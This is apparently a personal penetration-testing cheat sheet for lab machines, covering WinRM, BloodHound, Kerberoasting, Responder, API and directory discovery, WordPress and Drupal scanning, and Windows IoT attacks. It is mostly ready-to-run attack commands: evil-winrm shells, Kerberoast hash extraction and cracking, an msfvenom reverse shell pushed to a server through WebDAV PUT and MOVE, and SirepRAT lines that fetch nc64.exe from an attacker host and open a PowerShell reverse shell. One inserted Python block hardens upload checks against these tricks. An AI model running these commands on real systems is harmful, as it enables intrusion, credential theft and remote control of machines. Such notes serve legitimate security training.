winrm leverages powershell remoting over tcp 5986 (https) or tcp 5985 (http)
☐ crackmapexec winrm 10.10.10.10 -u user_name -p 'password123' if you see Pwn3d! you can get a shell, otherwise it is just a valid login
☐ if you do see Pwn3d! then evil-winrm -i 192.168.200.220 -u username -p "password123!" to get a shell
BloodHound
Let's use bloodhound-python to remotely gather information with our credentials (you might want to download the latest version from GitHub)
Collect all information on the domain (requires credential)
☐ bloodhound-python -u username -p password -d domain.tld -ns domain-controller-ip -c All can add --zip
on your kali machine, run
☐ neo4j console
If you need a login, it should be neo4j Minifiguresrcool2*
in another terminal (if it fails, try running as a non-root user) run
☐ bloodhound
login with neo4j Minifiguresrcool2*
click the “upload data” icon and select your zip files
From the hamburger select whatever query you want
☐ Use cat 1231351_users.json | jq '.data[].Properties | select( .enabled == true) | .name' -r > bloodhoundusers.txt to get a list of all valid usernames for password spraying with other tools
☐ cat bloodhoundusers.txt | awk -F@ '{print $1}' > justnameusers.txt to remove the @domain.name part of the usernames
☐ Use cat 1231351_users.json | jq '.data[].Properties | select( .description != null) | .name + ": " + .description' to get all users with a non-null description
Found a user that is kerberoastable in BloodHound? Run this with the same credentials you used to gather the BloodHound data.
☐ GetUserSPNs.py intelligence.htb/Jose.Williams:Password123! -outputfile GetUserSPNuserhash
☐ crack it with hashcat GetUserSPNuserhash /usr/share/wordlists/rockyou.txt
♦ What Else Can We Check?
Responder
If you come across a script, port, or DNS record that is using or might be using credentials, see if you can catch those credentials with Responder.
☐ responder -I tun0 which will start various servers, including http
dnstool.py
• -u intelligence\\Tiffany.Molina - The user to authenticate as;
• -p NewIntelligenceCorpUser9876 - The user’s password;
• --action add - Adding a new record;
• --record web-0xdf - The domain to add;
• --data 10.01.14.19 - The data to add, in this case, the IP to resolve web-0xdf to;
• --type A - The type of record to add.
☐ python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record web-0xdf --data 10.10.14.19 --type A intelligence.htb
This can be used with responder above in some situations
APIs
Web API Indicators
APIs meant for consumer use are meant to be easily discovered. Typically, the API provider will market their API to developers who want to be consumers. So, it will often be very easy to find APIs, just by using a web application as an end-user. The goal here is to find APIs to attack and this can be accomplished by discovering the API itself or the API documentation. If you can find the target's API and documentation as an end-user then mission accomplished, you have successfully discovered an API.
Another way to find an API provided by a target is to look around the target's landing page. Look through a landing page for links to API or development portal. When searching for APIs there are several signs that will indicate that you have discovered the existence of a web API. Be on the lookout for obvious URL naming schemes:
https://target-name.com/api/v1
https://api.target-name.com/v1
https://target-name.com/docs
https://dev.target-name.com/rest
Look for API indicators within directory names like:
/api, /api/v1, /v1, /v2, /v3, /rest, /swagger, /swagger.json, /doc, /docs, /graphql, /graphiql, /altair, /playground
Subdomains can also be indicators of web APIs:
api.target-name.com
uat.target-name.com
dev.target-name.com
developer.target-name.com
test.target-name.com
Another indicator of web APIs is the HTTP request and response headers. The use of JSON or XML can be a good indicator that you have discovered an API.
HTTP Request and Response Headers containing "Content-Type: application/json, application/xml"
Also, watch for HTTP Responses that include statements like:
{"message": "Missing Authorization token"}
One of the most obvious indicators of an API is information gathered from third-party sources like GitHub and API directories.
GitHub:
https://github.com/
Postman Explore:
https://www.postman.com/explore/apis
ProgrammableWeb API Directory:
https://www.programmableweb.com/apis/directory
APIs Guru:
https://apis.guru/
Public APIs Github Project:
https://github.com/public-apis/public-apis
RapidAPI Hub:
https://rapidapi.com/search/
When searching for a target's APIs, use the target's web application as it was designed. Use a browser to go to the web application and see if an API is advertised. Once you have an idea of how the web app functions, dig deeper by deploying passive and active reconnaissance techniques.
Fuzzing
wfuzz
☐ wfuzz -u http://website.com/example.php -z range,445-447 -d 'file-http:127.0.0.1:FUZZ&read=Scan+File'
ffuf
Subdomains
-fw filters by word count: run without it first and check whether the Words: column is all the same, then use it to filter those false positives
Directory Busting
☐ gobuster dir -u http://10.10.10.75:80/ --wordlist /usr/share/dirb/wordlists/big.txt -x aspx,php,txt,sh,cgi,pl,conf,cnf
☐ --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt try with this wordlist as well
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
☐ dirbuster
☐ feroxbuster --url http://something.com:80/
☐ by default uses the wordlist raft-medium-directories.txt
Dirbuster
☐ dirbuster
Input the target URL and select your wordlist. The folder containing this .txt file also holds several other good wordlists
file extensions to add if you cannot find anything: sh, asp, aspx, cgi, txt, cnf, conf, pl
Gobuster
☐ gobuster dir -u http://10.10.10.75:80/ --wordlist /usr/share/dirb/wordlists/big.txt -x aspx,php,txt
Feroxbuster
☐ feroxbuster --url http://something.com:80/
☐ -x pdf,html,asp,aspx,php,txt,json etc. to add extensions.
helpful settings:
--burp automatically proxy traffic to http://127.0.0.1:8080
Web Applications
Checklist For Website Enumeration
Start a dirbuster scan after glancing at the pages; start it first because the scan takes a long time.
☑ dirbuster > use usr/share/dirbuster/wordlists/medium lowercase
If nothing is found, run the search again with more file extensions like: sh, asp, aspx, cgi, txt, cnf, conf, html
If you cannot get any scanner to work due to errors, use Burp Suite's Site Map feature
When you can't find anything, read through every single document - keep track of which ones you have been to in burp
☐ If you cannot find anything interesting, check that exploring the webpage did not reveal more folders and documents to explore
Also check for subdomains if you are running out of ideas
☑ gobuster vhost -u domain.com -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
guess what the domain.com is if you don't know
☐ Check the source code while waiting for directory scan
☑ Check the response headers for interesting information
☑ If SSL is active, view the certificate. Often it will contain an FQDN to add to your /etc/hosts, giving access to a different website
☐ View all page requests in burp, including the root /. You could be getting redirected to a page but the original page could still be shown in the response. This is an execution after redirect vulnerability.
☐ In Burp click Action on a request, and select Do intercept > Response to this request. Change something like "302 Found" to "200 OK" to get it to load
If nmap returns a version of software look for an exploit
☐ use searchsploit -m exploit/path/name.txt to quickly copy your exploit into your current directory
EVEN IF SOMETHING looks like custom software or a random title google it anyways for exploits - oscp
If dealing with a login page look for:
☑ Default credentials or credentials like admin admin
Use Burp Suite to bruteforce logins
Files from the dirbuster search which reveal user information
SQL injection
If you have a form where you can submit messages or other text try adding:
<img src="http://yourip/test"></img> and
<a href="http://yourip/">click me</a>
Setup a simple netcat listen on port 80 before submitting
☐ use davtest -url http://10.10.10.10 to test for file upload and file execution - especially if you have the put and move options from nmap scan
use cadaver 10.10.10.15 to interact with web dav
☐ maybe you can't upload and execute the file you need - try uploading the file as an allowed extension and moving it to the correct extension
To do this, change the request in Burp from PUT or GET to MOVE /filename.html and directly underneath the first line add Destination: /filename.aspx
If your file upload extension is being blocked, try uploading it with a null byte: shell.aspx%00.jpg tricks the check into thinking it is a jpg
☐ Here is how to do it with curl:
msfvenom -p windows/shell_reverse_tcp LHOST=lhost LPORT=lport -f aspx -o revshell.aspx
7. Rename the exploit to a .txt file, because we can only upload txt and html files
mv revshell.aspx revshell.txt
8. Upload the revshell.txt file
curl -X PUT http://granny.htb/revshell.txt --data-binary @revshell.txt
9. Rename revshell.txt back to .aspx.
curl -X MOVE --header 'Destination:http://granny.htb/revshell.aspx' 'http://granny.htb/revshell.txt'
10. Start a netcat listener to catch the reverse shell, then request the page.
nc -nlvp 14143 and curl http://10.10.10.15/revshell.aspx
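The null-byte and PUT-then-MOVE tricks above work against an upload check that only looks at the last extension of the raw name. The following is an added defensive example, not code from the notes: the vulnerable check next to a hardened one, plus a MOVE policy that applies the same check to the Destination. ALLOWED and the sample names are constructed.

```python
"""Added defensive example (not from the original notes): an upload-name
check that the tricks above get past, beside a hardened version that
refuses them, and a WebDAV MOVE policy built on the hardened check."""
import os
import re
from urllib.parse import unquote

ALLOWED = {".txt", ".html", ".jpg"}      # extensions the server intends to accept
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def naive_extension_ok(raw_name: str) -> bool:
    """Vulnerable check: trusts the last dot-suffix of the decoded name.
    'shell.aspx%00.jpg' decodes to 'shell.aspx\\x00.jpg'; this sees '.jpg',
    while a C-level open() of the same string stops at the NUL and writes
    'shell.aspx'."""
    return os.path.splitext(unquote(raw_name))[1].lower() in ALLOWED


def hardened_filename(raw_name: str):
    """Return the sanitized basename to store, or None to reject.  Decodes
    first, rejects control characters (including NUL) and dotfiles, strips
    any directory part (so a full MOVE Destination URL is reduced to its
    basename), and allowlists every dot-suffix so 'shell.aspx.jpg' and
    'shell.aspx\\x00.jpg' are both refused."""
    name = unquote(raw_name)
    if not name or CONTROL.search(name):
        return None
    name = os.path.basename(name.replace("\\", "/"))
    if name in ("", ".", "..") or name.startswith("."):
        return None
    parts = name.lower().split(".")
    if len(parts) < 2 or any("." + ext not in ALLOWED for ext in parts[1:]):
        return None
    return name


def move_allowed(source: str, destination: str) -> bool:
    """WebDAV MOVE policy: the Destination must pass the same check as the
    upload, so revshell.txt -> revshell.aspx is refused even though the PUT
    of revshell.txt was accepted."""
    return (hardened_filename(source) is not None
            and hardened_filename(destination) is not None)


if __name__ == "__main__":
    for raw in ("notes.txt", "shell.aspx%00.jpg", "shell.aspx.jpg"):
        print(raw, "naive:", naive_extension_ok(raw), "hardened:", hardened_filename(raw))
    print("MOVE .txt -> .aspx allowed:",
          move_allowed("http://granny.htb/revshell.txt", "http://granny.htb/revshell.aspx"))
```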
Drupal
If you find that Drupal is running on a web server there is a tool designed specifically for it called droopescan. This tool is 9 years old so I don't know how helpful this is anymore.
☐ droopescan scan drupal -u 10.10.10.10
☐ One of the default files in Drupal is /CHANGELOG.txt; at the top you can see the latest version and publish date, then google e.g. drupal 7.54 exploits
WordPress
Directories to check out:
/wp-content
/wp-content/plugins
/wp-admin
/wp-login
Lookup any plugins you find for exploits
WP-Scan
☐ wpscan --url http://something.com --plugins-detection aggressive -e ap
(starts out in passive mode but that can miss things. -e ap is enumerate all plugins)
☐ you can do -e vp for enumerate vulnerable plugins instead
do -e u to enumerate users
!!! If you see errors about API tokens, you'll have to go to the WPScan vulnerability website, sign up, get an API token, and run your wpscan commands with:
☐ --api-token tokenhere at the end
Feroxbuster
☐ feroxbuster -u http://backdoor.htb/wp-content/plugins -w plugins.txt
Cookies
If you somehow get a valid login session with the values session_name, session_id, and token, you can use the Cookie-Editor extension in Firefox to add this cookie
☐ click on the Cookie-Editor extension, select Add, and enter the session_name as the name and the session_id as the value. Browse the page to see if the session is valid
Some exploits want a cookie in the format session_name=session_id, for example SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs
Windows
☐ If you ping the device and the ttl (time to live) is around 128 it is a windows machine. The ttl decreases by one for every router it passes through so most commonly you will see 127
IoT Core
☐ python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd "C:\Windows\System32\hostname.exe" --v --return_output to verify execution
python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell hostname" --v --return_output to verify powershell execution
python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell IWR -Uri http://10.10.10.10:8000/nc64.exe -Outfile c:\nc64.exe" --v --return_output
☐ python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd "C:\Windows\System32\cmd.exe" --args "/c c:\nc64.exe -e powershell 10.10.10.10 4444" --v --return_output
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:\windows\system32\spool\drivers\color\nc.exe -uri http://10.10.14.24/nc64.exe'
Work through various windows downloading methods to try and download a reverse shell
IIS Versions
☐ by seeing what version of IIS is running you can know what type of windows is running
Linux
☐ If you ping the device and the ttl (time to live) is around 64 it is a linux machine. The ttl decreases by one for every router it passes through so most commonly you will see 63
Nessus
☐ systemctl start nessusd.service
https://127.0.0.1:8834
Git
Git Repository On Website
If you find a website that exposes a .git directory, or something that looks like one, you can use
☐ git-dumper http://192.168.249.144/.git/ folder/to/put/in
to copy all the files locally. Change into that directory and then you can use git commands in it to view information
☐ git log to see all of the logs
☐ use git show commitnumberhere to view a certain commit
GitLab